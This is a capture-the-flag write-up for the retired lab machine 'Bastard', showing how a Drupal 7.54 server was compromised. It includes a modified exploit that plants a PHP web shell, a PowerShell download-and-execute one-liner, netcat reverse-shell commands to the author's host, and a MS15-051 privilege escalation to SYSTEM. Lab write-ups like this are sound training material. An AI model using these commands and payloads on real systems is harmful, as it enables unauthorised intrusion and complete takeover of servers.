This is the write-up for the box Bastard that got retired at the 16th September 2017. My IP address was 10.10.14.23 while I did this.
Let's put this in our hosts file:
10.10.10.9 bastard.htb
Starting with a Nmap scan:
nmap -sC -sV -o nmap/bastard.nmap 10.10.10.9
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
As the web server is IIS version 7.5 the OS of the box is most likely Windows Sever 2008 R2 server.
On the web page there is a Drupal installation. One of the default files of Drupal is the /CHANGELOG.txt where we can find out which version this is. The version is 7.54 which was released on February 1st 2017.
Looking for exploits for this:
searchsploit drupal 7
The exploit to use is called "Drupal 7.x Module Services - Remote Code Execution" which is a PHP serialization vulnerability. We will change some lines in the code to get command execution and file upload and set the variables correctly:
# (...)
$url = 'http://10.10.10.9/';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$phpCode = <<<'EOD'
<?php
if (isset($_REQUEST['upload'])) {
file_put_contents($_REQUEST['upload'], file_get_contents("http://10.10.14.23:8000/" . $_REQUEST['upload']));
};
if (isset($_REQUEST['exec'])) {
echo "<pre>" . shell_exec($_REQUEST['exec']) . "</pre>";
};
?>
EOD;
$file = [
'filename' => 'exploit.php',
'data' => $phpCode
];
# (...)
Run the exploit:
php5 drupal_exploit.php
# Output
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9//exploit.php
Now when browsing to this page we can test if we have command execution:
http://10.10.10.9/exploit.php?exec=whoami
It outputs that we are NT Authority\iusr.
Now we either have command execution with this method or use the token in the file session.json and replace the cookies with these values and get logged in as Admin:
We should run any enumeration script on this box to get an attack surface. I will run PowerUP.ps1 from the Powersploit Framework first.
Download the file from my local machine and run it:
.../exploit.php?exec=echo IEX(New-Object Net.WebClient).downloadString('http://10.10.14.23:8000/PowerUp.ps1') | powershell -noprofile -
Unfortunately there is no interesting information in this output so lets run another enumeration script. I will run Sherlock now to get some suggestions for vulnerabilities to exploit.
We want to upload Netcat for Windows on this box and execute it to get a reverse shell:
/exploit.php?upload=nc64.exe&exec=nc64.exe -e cmd 10.10.14.23 9001
After running this our listener on port 9001 starts a reverse shell.
The enumeration script suggested some exploits to use and I will use MS15-051 - Win32k LPE vulnerability also known as CVE-2015-1701. To use this exploit we copy the Proof-of-Concept script from GitHub to our local machine and upload and execute it on the box.
/exploit.php?upload=ms15-051x64.exe&exec=ms15-051x64.exe whoami
This outputs that we are NT Authority\SYSTEM and thus the exploit works and it is possible to start a shell with this.
/exploit.php?upload=ms15-051x64.exe&exec=ms15-051x64.exe "nc64.exe -e cmd 10.10.14.23 9002"
After running this our listener on port 9002 starts a reverse shell with the user NT Authority\SYSTEM and the box is done!